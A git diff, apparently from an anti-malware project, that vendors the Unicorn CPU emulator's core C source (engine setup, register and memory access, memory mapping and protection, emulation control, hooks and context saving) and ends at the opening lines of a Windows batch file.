+uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **result) +{ + struct uc_struct *uc; + + if (arch < UC_ARCH_MAX) { + uc = calloc(1, sizeof(*uc)); + if (!uc) { + // memory insufficient + return UC_ERR_NOMEM; + } + + uc->errnum = UC_ERR_OK; + uc->arch = arch; + uc->mode = mode; + + // uc->ram_list = { .blocks = QTAILQ_HEAD_INITIALIZER(ram_list.blocks) }; + uc->ram_list.blocks.tqh_first = NULL; + uc->ram_list.blocks.tqh_last = &(uc->ram_list.blocks.tqh_first); + + uc->memory_listeners.tqh_first = NULL; + uc->memory_listeners.tqh_last = &uc->memory_listeners.tqh_first; + + uc->address_spaces.tqh_first = NULL; + uc->address_spaces.tqh_last = &uc->address_spaces.tqh_first; + + switch(arch) { + default: + break; +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: + if ((mode & ~UC_MODE_M68K_MASK) || + !(mode & UC_MODE_BIG_ENDIAN)) { + free(uc); + return UC_ERR_MODE; + } + uc->init_arch = m68k_uc_init; + break; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: + if ((mode & ~UC_MODE_X86_MASK) || + (mode & UC_MODE_BIG_ENDIAN) || + !(mode & (UC_MODE_16|UC_MODE_32|UC_MODE_64))) { + free(uc); + return UC_ERR_MODE; + } + uc->init_arch = x86_uc_init; + break; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + if ((mode & ~UC_MODE_ARM_MASK)) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { +#ifdef UNICORN_HAS_ARMEB + uc->init_arch = armeb_uc_init; +#else + return UC_ERR_MODE; +#endif + } else { + uc->init_arch = arm_uc_init; + } + + if (mode & UC_MODE_THUMB) + uc->thumb = 1; + break; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: + if (mode & ~UC_MODE_ARM_MASK) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { + uc->init_arch = arm64eb_uc_init; + } else { + uc->init_arch = arm64_uc_init; + } + break; +#endif + +#if defined(UNICORN_HAS_MIPS) || defined(UNICORN_HAS_MIPSEL) || defined(UNICORN_HAS_MIPS64) || defined(UNICORN_HAS_MIPS64EL) + case UC_ARCH_MIPS: + if ((mode & ~UC_MODE_MIPS_MASK) || + !(mode & (UC_MODE_MIPS32|UC_MODE_MIPS64))) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { +#ifdef UNICORN_HAS_MIPS + if (mode & UC_MODE_MIPS32) + uc->init_arch = mips_uc_init; +#endif +#ifdef UNICORN_HAS_MIPS64 + if (mode & UC_MODE_MIPS64) + uc->init_arch = mips64_uc_init; +#endif + } else { // little endian +#ifdef UNICORN_HAS_MIPSEL + if (mode & UC_MODE_MIPS32) + uc->init_arch = mipsel_uc_init; +#endif +#ifdef UNICORN_HAS_MIPS64EL + if (mode & UC_MODE_MIPS64) + uc->init_arch = mips64el_uc_init; +#endif + } + break; +#endif + +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: + if ((mode & ~UC_MODE_SPARC_MASK) || + !(mode & UC_MODE_BIG_ENDIAN) || + !(mode & (UC_MODE_SPARC32|UC_MODE_SPARC64))) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_SPARC64) + uc->init_arch = sparc64_uc_init; + else + uc->init_arch = sparc_uc_init; + break; +#endif + } + + if (uc->init_arch == NULL) { + return UC_ERR_ARCH; + } + + if (machine_initialize(uc)) + return UC_ERR_RESOURCE; + + *result = uc; + + if (uc->reg_reset) + uc->reg_reset(uc); + + return UC_ERR_OK; + } else { + return UC_ERR_ARCH; + } +} + + +UNICORN_EXPORT +uc_err uc_close(uc_engine *uc) +{ + int i; + struct list_item *cur; + struct hook *hook; + + // Cleanup internally. + if (uc->release) + uc->release(uc->tcg_ctx); + g_free(uc->tcg_ctx); + + // Cleanup CPU. + g_free(uc->cpu->tcg_as_listener); + g_free(uc->cpu->thread); + + // Cleanup all objects. + OBJECT(uc->machine_state->accelerator)->ref = 1; + OBJECT(uc->machine_state)->ref = 1; + OBJECT(uc->owner)->ref = 1; + OBJECT(uc->root)->ref = 1; + + object_unref(uc, OBJECT(uc->machine_state->accelerator)); + object_unref(uc, OBJECT(uc->machine_state)); + object_unref(uc, OBJECT(uc->cpu)); + object_unref(uc, OBJECT(&uc->io_mem_notdirty)); + object_unref(uc, OBJECT(&uc->io_mem_unassigned)); + object_unref(uc, OBJECT(&uc->io_mem_rom)); + object_unref(uc, OBJECT(uc->root)); + + // System memory. + g_free(uc->system_memory); + + // Thread relateds. + if (uc->qemu_thread_data) + g_free(uc->qemu_thread_data); + + // Other auxilaries. + free(uc->l1_map); + + if (uc->bounce.buffer) { + free(uc->bounce.buffer); + } + + g_hash_table_foreach(uc->type_table, free_table, uc); + g_hash_table_destroy(uc->type_table); + + for (i = 0; i < DIRTY_MEMORY_NUM; i++) { + free(uc->ram_list.dirty_memory[i]); + } + + // free hooks and hook lists + for (i = 0; i < UC_HOOK_MAX; i++) { + cur = uc->hook[i].head; + // hook can be in more than one list + // so we refcount to know when to free + while (cur) { + hook = (struct hook *)cur->data; + if (--hook->refs == 0) { + free(hook); + } + cur = cur->next; + } + list_clear(&uc->hook[i]); + } + + free(uc->mapped_blocks); + + // free the saved contexts list and notify them that uc has been closed. + cur = uc->saved_contexts.head; + while (cur != NULL) { + struct list_item *next = cur->next; + struct uc_context *context = (struct uc_context*)cur->data; + context->uc = NULL; + cur = next; + } + list_clear(&uc->saved_contexts); + + // finally, free uc itself. + memset(uc, 0, sizeof(*uc)); + free(uc); + + return UC_ERR_OK; +} + + +UNICORN_EXPORT +uc_err uc_reg_read_batch(uc_engine *uc, int *ids, void **vals, int count) +{ + if (uc->reg_read) + uc->reg_read(uc, (unsigned int *)ids, vals, count); + else + return -1; // FIXME: need a proper uc_err + + return UC_ERR_OK; +} + + +UNICORN_EXPORT +uc_err uc_reg_write_batch(uc_engine *uc, int *ids, void *const *vals, int count) +{ + int ret = UC_ERR_OK; + if (uc->reg_write) + ret = uc->reg_write(uc, (unsigned int *)ids, vals, count); + else + return UC_ERR_EXCEPTION; // FIXME: need a proper uc_err + + return ret; +} + + +UNICORN_EXPORT +uc_err uc_reg_read(uc_engine *uc, int regid, void *value) +{ + return uc_reg_read_batch(uc, ®id, &value, 1); +} + +UNICORN_EXPORT +uc_err uc_reg_write(uc_engine *uc, int regid, const void *value) +{ + return uc_reg_write_batch(uc, ®id, (void *const *)&value, 1); +} + +// check if a memory area is mapped +// this is complicated because an area can overlap adjacent blocks +static bool check_mem_area(uc_engine *uc, uint64_t address, size_t size) +{ + size_t count = 0, len; + + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + len = (size_t)MIN(size - count, mr->end - address); + count += len; + address += len; + } else // this address is not mapped in yet + break; + } + + return (count == size); +} + + +UNICORN_EXPORT +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *_bytes, size_t size) +{ + size_t count = 0, len; + uint8_t *bytes = _bytes; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + if (!check_mem_area(uc, address, size)) + return UC_ERR_READ_UNMAPPED; + + // memory area can overlap adjacent memory blocks + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + len = (size_t)MIN(size - count, mr->end - address); + if (uc->read_mem(&uc->as, address, bytes, len) == false) + break; + count += len; + address += len; + bytes += len; + } else // this address is not mapped in yet + break; + } + + if (count == size) + return UC_ERR_OK; + else + return UC_ERR_READ_UNMAPPED; +} + +UNICORN_EXPORT +uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *_bytes, size_t size) +{ + size_t count = 0, len; + const uint8_t *bytes = _bytes; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + if (!check_mem_area(uc, address, size)) + return UC_ERR_WRITE_UNMAPPED; + + // memory area can overlap adjacent memory blocks + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + uint32_t operms = mr->perms; + if (!(operms & UC_PROT_WRITE)) // write protected + // but this is not the program accessing memory, so temporarily mark writable + uc->readonly_mem(mr, false); + + len = (size_t)MIN(size - count, mr->end - address); + if (uc->write_mem(&uc->as, address, bytes, len) == false) + break; + + if (!(operms & UC_PROT_WRITE)) // write protected + // now write protect it again + uc->readonly_mem(mr, true); + + count += len; + address += len; + bytes += len; + } else // this address is not mapped in yet + break; + } + + if (count == size) + return UC_ERR_OK; + else + return UC_ERR_WRITE_UNMAPPED; +} + +#define TIMEOUT_STEP 2 // microseconds +static void *_timeout_fn(void *arg) +{ + struct uc_struct *uc = arg; + int64_t current_time = get_clock(); + + do { + usleep(TIMEOUT_STEP); + // perhaps emulation is even done before timeout? + if (uc->emulation_done) + break; + } while((uint64_t)(get_clock() - current_time) < uc->timeout); + + // timeout before emulation is done? + if (!uc->emulation_done) { + uc->timed_out = true; + // force emulation to stop + uc_emu_stop(uc); + } + + return NULL; +} + +static void enable_emu_timer(uc_engine *uc, uint64_t timeout) +{ + uc->timeout = timeout; + qemu_thread_create(uc, &uc->timer, "timeout", _timeout_fn, + uc, QEMU_THREAD_JOINABLE); +} + +static void hook_count_cb(struct uc_struct *uc, uint64_t address, uint32_t size, void *user_data) +{ + // count this instruction. ah ah ah. + uc->emu_counter++; + + if (uc->emu_counter > uc->emu_count) + uc_emu_stop(uc); +} + +static void clear_deleted_hooks(uc_engine *uc) +{ + struct list_item * cur; + struct hook * hook; + int i; + + for (cur = uc->hooks_to_del.head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { + assert(hook->to_delete); + for (i = 0; i < UC_HOOK_MAX; i++) { + if (list_remove(&uc->hook[i], (void *)hook)) { + if (--hook->refs == 0) { + free(hook); + } + + // a hook cannot be twice in the same list + break; + } + } + } + + list_clear(&uc->hooks_to_del); +} + +UNICORN_EXPORT +uc_err uc_emu_start(uc_engine* uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count) +{ + // reset the counter + uc->emu_counter = 0; + uc->invalid_error = UC_ERR_OK; + uc->block_full = false; + uc->emulation_done = false; + uc->size_recur_mem = 0; + uc->timed_out = false; + + switch(uc->arch) { + default: + break; +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: + uc_reg_write(uc, UC_M68K_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: + switch(uc->mode) { + default: + break; + case UC_MODE_16: { + uint64_t ip; + uint16_t cs; + + uc_reg_read(uc, UC_X86_REG_CS, &cs); + // compensate for later adding up IP & CS + ip = begin - cs*16; + uc_reg_write(uc, UC_X86_REG_IP, &ip); + break; + } + case UC_MODE_32: + uc_reg_write(uc, UC_X86_REG_EIP, &begin); + break; + case UC_MODE_64: + uc_reg_write(uc, UC_X86_REG_RIP, &begin); + break; + } + break; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + uc_reg_write(uc, UC_ARM_REG_R15, &begin); + break; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: + uc_reg_write(uc, UC_ARM64_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: + // TODO: MIPS32/MIPS64/BIGENDIAN etc + uc_reg_write(uc, UC_MIPS_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: + // TODO: Sparc/Sparc64 + uc_reg_write(uc, UC_SPARC_REG_PC, &begin); + break; +#endif + } + + uc->stop_request = false; + + uc->emu_count = count; + // remove count hook if counting isn't necessary + if (count <= 0 && uc->count_hook != 0) { + uc_hook_del(uc, uc->count_hook); + uc->count_hook = 0; + } + // set up count hook to count instructions. + if (count > 0 && uc->count_hook == 0) { + uc_err err; + // callback to count instructions must be run before everything else, + // so instead of appending, we must insert the hook at the begin + // of the hook list + uc->hook_insert = 1; + err = uc_hook_add(uc, &uc->count_hook, UC_HOOK_CODE, hook_count_cb, NULL, 1, 0); + // restore to append mode for uc_hook_add() + uc->hook_insert = 0; + if (err != UC_ERR_OK) { + return err; + } + } + + uc->addr_end = until; + + if (timeout) + enable_emu_timer(uc, timeout * 1000); // microseconds -> nanoseconds + + if (uc->vm_start(uc)) { + return UC_ERR_RESOURCE; + } + + // emulation is done + uc->emulation_done = true; + + // remove hooks to delete + clear_deleted_hooks(uc); + + if (timeout) { + // wait for the timer to finish + qemu_thread_join(&uc->timer); + } + + return uc->invalid_error; +} + + +UNICORN_EXPORT +uc_err uc_emu_stop(uc_engine *uc) +{ + if (uc->emulation_done) + return UC_ERR_OK; + + uc->stop_request = true; + // TODO: make this atomic somehow? + if (uc->current_cpu) { + // exit the current TB + cpu_exit(uc->current_cpu); + } + + return UC_ERR_OK; +} + +// find if a memory range overlaps with existing mapped regions +static bool memory_overlap(struct uc_struct *uc, uint64_t begin, size_t size) +{ + unsigned int i; + uint64_t end = begin + size - 1; + + for(i = 0; i < uc->mapped_block_count; i++) { + // begin address falls inside this region? + if (begin >= uc->mapped_blocks[i]->addr && begin <= uc->mapped_blocks[i]->end - 1) + return true; + + // end address falls inside this region? + if (end >= uc->mapped_blocks[i]->addr && end <= uc->mapped_blocks[i]->end - 1) + return true; + + // this region falls totally inside this range? + if (begin < uc->mapped_blocks[i]->addr && end > uc->mapped_blocks[i]->end - 1) + return true; + } + + // not found + return false; +} + +// common setup/error checking shared between uc_mem_map and uc_mem_map_ptr +static uc_err mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, MemoryRegion *block) +{ + MemoryRegion **regions; + + if (block == NULL) + return UC_ERR_NOMEM; + + if ((uc->mapped_block_count & (MEM_BLOCK_INCR - 1)) == 0) { //time to grow + regions = (MemoryRegion**)g_realloc(uc->mapped_blocks, + sizeof(MemoryRegion*) * (uc->mapped_block_count + MEM_BLOCK_INCR)); + if (regions == NULL) { + return UC_ERR_NOMEM; + } + uc->mapped_blocks = regions; + } + + uc->mapped_blocks[uc->mapped_block_count] = block; + uc->mapped_block_count++; + + return UC_ERR_OK; +} + +static uc_err mem_map_check(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) +{ + if (size == 0) + // invalid memory mapping + return UC_ERR_ARG; + + // address cannot wrapp around + if (address + size - 1 < address) + return UC_ERR_ARG; + + // address must be aligned to uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // size must be multiple of uc->target_page_size + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // check for only valid permissions + if ((perms & ~UC_PROT_ALL) != 0) + return UC_ERR_ARG; + + // this area overlaps existing mapped regions? + if (memory_overlap(uc, address, size)) { + return UC_ERR_MAP; + } + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) +{ + uc_err res; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + res = mem_map_check(uc, address, size, perms); + if (res) + return res; + + return mem_map(uc, address, size, perms, uc->memory_map(uc, address, size, perms)); +} + +UNICORN_EXPORT +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr) +{ + uc_err res; + + if (ptr == NULL) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + res = mem_map_check(uc, address, size, perms); + if (res) + return res; + + return mem_map(uc, address, size, UC_PROT_ALL, uc->memory_map_ptr(uc, address, size, perms, ptr)); +} + +// Create a backup copy of the indicated MemoryRegion. +// Generally used in prepartion for splitting a MemoryRegion. +static uint8_t *copy_region(struct uc_struct *uc, MemoryRegion *mr) +{ + uint8_t *block = (uint8_t *)g_malloc0((size_t)int128_get64(mr->size)); + if (block != NULL) { + uc_err err = uc_mem_read(uc, mr->addr, block, (size_t)int128_get64(mr->size)); + if (err != UC_ERR_OK) { + free(block); + block = NULL; + } + } + + return block; +} + +/* + Split the given MemoryRegion at the indicated address for the indicated size + this may result in the create of up to 3 spanning sections. If the delete + parameter is true, the no new section will be created to replace the indicate + range. This functions exists to support uc_mem_protect and uc_mem_unmap. + + This is a static function and callers have already done some preliminary + parameter validation. + + The do_delete argument indicates that we are being called to support + uc_mem_unmap. In this case we save some time by choosing NOT to remap + the areas that are intended to get unmapped + */ +// TODO: investigate whether qemu region manipulation functions already offered +// this capability +static bool split_region(struct uc_struct *uc, MemoryRegion *mr, uint64_t address, + size_t size, bool do_delete) +{ + uint8_t *backup; + uint32_t perms; + uint64_t begin, end, chunk_end; + size_t l_size, m_size, r_size; + RAMBlock *block = NULL; + bool prealloc = false; + + chunk_end = address + size; + + // if this region belongs to area [address, address+size], + // then there is no work to do. + if (address <= mr->addr && chunk_end >= mr->end) + return true; + + if (size == 0) + // trivial case + return true; + + if (address >= mr->end || chunk_end <= mr->addr) + // impossible case + return false; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (block->offset <= mr->addr && block->length >= (mr->end - mr->addr)) { + break; + } + } + + if (block == NULL) + return false; + + // RAM_PREALLOC is not defined outside exec.c and I didn't feel like + // moving it + prealloc = !!(block->flags & 1); + + if (block->flags & 1) { + backup = block->host; + } else { + backup = copy_region(uc, mr); + if (backup == NULL) + return false; + } + + // save the essential information required for the split before mr gets deleted + perms = mr->perms; + begin = mr->addr; + end = mr->end; + + // unmap this region first, then do split it later + if (uc_mem_unmap(uc, mr->addr, (size_t)int128_get64(mr->size)) != UC_ERR_OK) + goto error; + + /* overlapping cases + * |------mr------| + * case 1 |---size--| + * case 2 |--size--| + * case 3 |---size--| + */ + + // adjust some things + if (address < begin) + address = begin; + if (chunk_end > end) + chunk_end = end; + + // compute sub region sizes + l_size = (size_t)(address - begin); + r_size = (size_t)(end - chunk_end); + m_size = (size_t)(chunk_end - address); + + // If there are error in any of the below operations, things are too far gone + // at that point to recover. Could try to remap orignal region, but these smaller + // allocation just failed so no guarantee that we can recover the original + // allocation at this point + if (l_size > 0) { + if (!prealloc) { + if (uc_mem_map(uc, begin, l_size, perms) != UC_ERR_OK) + goto error; + if (uc_mem_write(uc, begin, backup, l_size) != UC_ERR_OK) + goto error; + } else { + if (uc_mem_map_ptr(uc, begin, l_size, perms, backup) != UC_ERR_OK) + goto error; + } + } + + if (m_size > 0 && !do_delete) { + if (!prealloc) { + if (uc_mem_map(uc, address, m_size, perms) != UC_ERR_OK) + goto error; + if (uc_mem_write(uc, address, backup + l_size, m_size) != UC_ERR_OK) + goto error; + } else { + if (uc_mem_map_ptr(uc, address, m_size, perms, backup + l_size) != UC_ERR_OK) + goto error; + } + } + + if (r_size > 0) { + if (!prealloc) { + if (uc_mem_map(uc, chunk_end, r_size, perms) != UC_ERR_OK) + goto error; + if (uc_mem_write(uc, chunk_end, backup + l_size + m_size, r_size) != UC_ERR_OK) + goto error; + } else { + if (uc_mem_map_ptr(uc, chunk_end, r_size, perms, backup + l_size + m_size) != UC_ERR_OK) + goto error; + } + } + + if (!prealloc) + free(backup); + return true; + +error: + if (!prealloc) + free(backup); + return false; +} + +UNICORN_EXPORT +uc_err uc_mem_protect(struct uc_struct *uc, uint64_t address, size_t size, uint32_t perms) +{ + MemoryRegion *mr; + uint64_t addr = address; + size_t count, len; + bool remove_exec = false; + + if (size == 0) + // trivial case, no change + return UC_ERR_OK; + + // address must be aligned to uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // size must be multiple of uc->target_page_size + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // check for only valid permissions + if ((perms & ~UC_PROT_ALL) != 0) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // check that user's entire requested block is mapped + if (!check_mem_area(uc, address, size)) + return UC_ERR_NOMEM; + + // Now we know entire region is mapped, so change permissions + // We may need to split regions if this area spans adjacent regions + addr = address; + count = 0; + while(count < size) { + mr = memory_mapping(uc, addr); + len = (size_t)MIN(size - count, mr->end - addr); + if (!split_region(uc, mr, addr, len, false)) + return UC_ERR_NOMEM; + + mr = memory_mapping(uc, addr); + // will this remove EXEC permission? + if (((mr->perms & UC_PROT_EXEC) != 0) && ((perms & UC_PROT_EXEC) == 0)) + remove_exec = true; + mr->perms = perms; + uc->readonly_mem(mr, (perms & UC_PROT_WRITE) == 0); + + count += len; + addr += len; + } + + // if EXEC permission is removed, then quit TB and continue at the same place + if (remove_exec) { + uc->quit_request = true; + uc_emu_stop(uc); + } + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_mem_unmap(struct uc_struct *uc, uint64_t address, size_t size) +{ + MemoryRegion *mr; + uint64_t addr; + size_t count, len; + + if (size == 0) + // nothing to unmap + return UC_ERR_OK; + + // address must be aligned to uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // size must be multiple of uc->target_page_size + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // check that user's entire requested block is mapped + if (!check_mem_area(uc, address, size)) + return UC_ERR_NOMEM; + + // Now we know entire region is mapped, so do the unmap + // We may need to split regions if this area spans adjacent regions + addr = address; + count = 0; + while(count < size) { + mr = memory_mapping(uc, addr); + len = (size_t)MIN(size - count, mr->end - addr); + if (!split_region(uc, mr, addr, len, true)) + return UC_ERR_NOMEM; + + // if we can retrieve the mapping, then no splitting took place + // so unmap here + mr = memory_mapping(uc, addr); + if (mr != NULL) + uc->memory_unmap(uc, mr); + count += len; + addr += len; + } + + return UC_ERR_OK; +} + +// find the memory region of this address +MemoryRegion *memory_mapping(struct uc_struct* uc, uint64_t address) +{ + unsigned int i; + + if (uc->mapped_block_count == 0) + return NULL; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // try with the cache index first + i = uc->mapped_block_cache_index; + + if (i < uc->mapped_block_count && address >= uc->mapped_blocks[i]->addr && address < uc->mapped_blocks[i]->end) + return uc->mapped_blocks[i]; + + for(i = 0; i < uc->mapped_block_count; i++) { + if (address >= uc->mapped_blocks[i]->addr && address <= uc->mapped_blocks[i]->end - 1) { + // cache this index for the next query + uc->mapped_block_cache_index = i; + return uc->mapped_blocks[i]; + } + } + + // not found + return NULL; +} + +UNICORN_EXPORT +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...) +{ + int ret = UC_ERR_OK; + int i = 0; + + struct hook *hook = calloc(1, sizeof(struct hook)); + if (hook == NULL) { + return UC_ERR_NOMEM; + } + + hook->begin = begin; + hook->end = end; + hook->type = type; + hook->callback = callback; + hook->user_data = user_data; + hook->refs = 0; + hook->to_delete = false; + *hh = (uc_hook)hook; + + // UC_HOOK_INSN has an extra argument for instruction ID + if (type & UC_HOOK_INSN) { + va_list valist; + + va_start(valist, end); + hook->insn = va_arg(valist, int); + va_end(valist); + + if (uc->insn_hook_validate) { + if (! uc->insn_hook_validate(hook->insn)) { + free(hook); + return UC_ERR_HOOK; + } + } + + if (uc->hook_insert) { + if (list_insert(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { + free(hook); + return UC_ERR_NOMEM; + } + } else { + if (list_append(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { + free(hook); + return UC_ERR_NOMEM; + } + } + + hook->refs++; + return UC_ERR_OK; + } + + while ((type >> i) > 0) { + if ((type >> i) & 1) { + // TODO: invalid hook error? + if (i < UC_HOOK_MAX) { + if (uc->hook_insert) { + if (list_insert(&uc->hook[i], hook) == NULL) { + if (hook->refs == 0) { + free(hook); + } + return UC_ERR_NOMEM; + } + } else { + if (list_append(&uc->hook[i], hook) == NULL) { + if (hook->refs == 0) { + free(hook); + } + return UC_ERR_NOMEM; + } + } + hook->refs++; + } + } + i++; + } + + // we didn't use the hook + // TODO: return an error? + if (hook->refs == 0) { + free(hook); + } + + return ret; +} + + +UNICORN_EXPORT +uc_err uc_hook_del(uc_engine *uc, uc_hook hh) +{ + int i; + struct hook *hook = (struct hook *)hh; + + // we can't dereference hook->type if hook is invalid + // so for now we need to iterate over all possible types to remove the hook + // which is less efficient + // an optimization would be to align the hook pointer + // and store the type mask in the hook pointer. + for (i = 0; i < UC_HOOK_MAX; i++) { + if (list_exists(&uc->hook[i], (void *) hook)) { + hook->to_delete = true; + list_append(&uc->hooks_to_del, hook); + } + } + + return UC_ERR_OK; +} + +// TCG helper +void helper_uc_tracecode(int32_t size, uc_hook_type type, void *handle, int64_t address); +void helper_uc_tracecode(int32_t size, uc_hook_type type, void *handle, int64_t address) +{ + struct uc_struct *uc = handle; + struct list_item *cur; + struct hook *hook; + + // sync PC in CPUArchState with address + if (uc->set_pc) { + uc->set_pc(uc, address); + } + + for (cur = uc->hook[type].head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { + if (hook->to_delete) + continue; + if (HOOK_BOUND_CHECK(hook, (uint64_t)address)) { + ((uc_cb_hookcode_t)hook->callback)(uc, address, size, hook->user_data); + } + } +} + +UNICORN_EXPORT +uint32_t uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count) +{ + uint32_t i; + uc_mem_region *r = NULL; + + *count = uc->mapped_block_count; + + if (*count) { + r = g_malloc0(*count * sizeof(uc_mem_region)); + if (r == NULL) { + // out of memory + return UC_ERR_NOMEM; + } + } + + for (i = 0; i < *count; i++) { + r[i].begin = uc->mapped_blocks[i]->addr; + r[i].end = uc->mapped_blocks[i]->end - 1; + r[i].perms = uc->mapped_blocks[i]->perms; + } + + *regions = r; + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result) +{ + switch(type) { + default: + return UC_ERR_ARG; + + case UC_QUERY_PAGE_SIZE: + *result = uc->target_page_size; + break; + + case UC_QUERY_ARCH: + *result = uc->arch; + break; + + case UC_QUERY_MODE: +#ifdef UNICORN_HAS_ARM + if (uc->arch == UC_ARCH_ARM) { + return uc->query(uc, type, result); + } +#endif + return UC_ERR_ARG; + + case UC_QUERY_TIMEOUT: + *result = uc->timed_out; + break; + } + + return UC_ERR_OK; +} + +static size_t cpu_context_size(uc_arch arch, uc_mode mode) +{ + // each of these constants is defined by offsetof(CPUXYZState, tlb_table) + // tbl_table is the first entry in the CPU_COMMON macro, so it marks the end + // of the interesting CPU registers + switch (arch) { +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: return M68K_REGS_STORAGE_SIZE; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: return X86_REGS_STORAGE_SIZE; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: return mode & UC_MODE_BIG_ENDIAN ? +#ifdef UNICORN_HAS_ARMEB + ARM_REGS_STORAGE_SIZE_armeb +#else + 0 +#endif + : ARM_REGS_STORAGE_SIZE_arm; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: return mode & UC_MODE_BIG_ENDIAN ? ARM64_REGS_STORAGE_SIZE_aarch64eb : ARM64_REGS_STORAGE_SIZE_aarch64; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: + if (mode & UC_MODE_MIPS64) { + if (mode & UC_MODE_BIG_ENDIAN) { + return MIPS64_REGS_STORAGE_SIZE_mips64; + } else { + return MIPS64_REGS_STORAGE_SIZE_mips64el; + } + } else { + if (mode & UC_MODE_BIG_ENDIAN) { + return MIPS_REGS_STORAGE_SIZE_mips; + } else { + return MIPS_REGS_STORAGE_SIZE_mipsel; + } + } +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: return mode & UC_MODE_SPARC64 ? SPARC64_REGS_STORAGE_SIZE : SPARC_REGS_STORAGE_SIZE; +#endif + default: return 0; + } +} + +UNICORN_EXPORT +uc_err uc_context_alloc(uc_engine *uc, uc_context **context) +{ + struct uc_context **_context = context; + size_t size = uc_context_size(uc); + + *_context = malloc(size); + if (*_context) { + (*_context)->jmp_env_size = sizeof(*uc->cpu->jmp_env); + (*_context)->context_size = cpu_context_size(uc->arch, uc->mode); + (*_context)->uc = uc; + if (list_insert(&uc->saved_contexts, *_context)) { + return UC_ERR_OK; + } else { + return UC_ERR_NOMEM; + } + } else { + return UC_ERR_NOMEM; + } +} + +UNICORN_EXPORT +uc_err uc_free(void *mem) +{ + g_free(mem); + return UC_ERR_OK; +} + +UNICORN_EXPORT +size_t uc_context_size(uc_engine *uc) +{ + // return the total size of struct uc_context + return sizeof(uc_context) + cpu_context_size(uc->arch, uc->mode) + sizeof(*uc->cpu->jmp_env); +} + +UNICORN_EXPORT +uc_err uc_context_save(uc_engine *uc, uc_context *context) +{ + memcpy(context->data, uc->cpu->env_ptr, context->context_size); + memcpy(context->data + context->context_size, uc->cpu->jmp_env, context->jmp_env_size); + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_context_restore(uc_engine *uc, uc_context *context) +{ + memcpy(uc->cpu->env_ptr, context->data, context->context_size); + if (list_exists(&uc->saved_contexts, context)) { + memcpy(uc->cpu->jmp_env, context->data + context->context_size, context->jmp_env_size); + } + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_context_free(uc_context *context) +{ + uc_engine* uc = context->uc; + // if uc is NULL, it means that uc_engine has been free-ed. + if (uc) { + list_remove(&uc->saved_contexts, context); + } + return uc_free(context); +} \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/windows_export.bat b/ai_anti_malware/unicorn/unicorn-master/windows_export.bat new file mode 100644 index 0000000..430efcc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/windows_export.bat @@ -0,0 +1,43 @@ +@echo off +setlocal 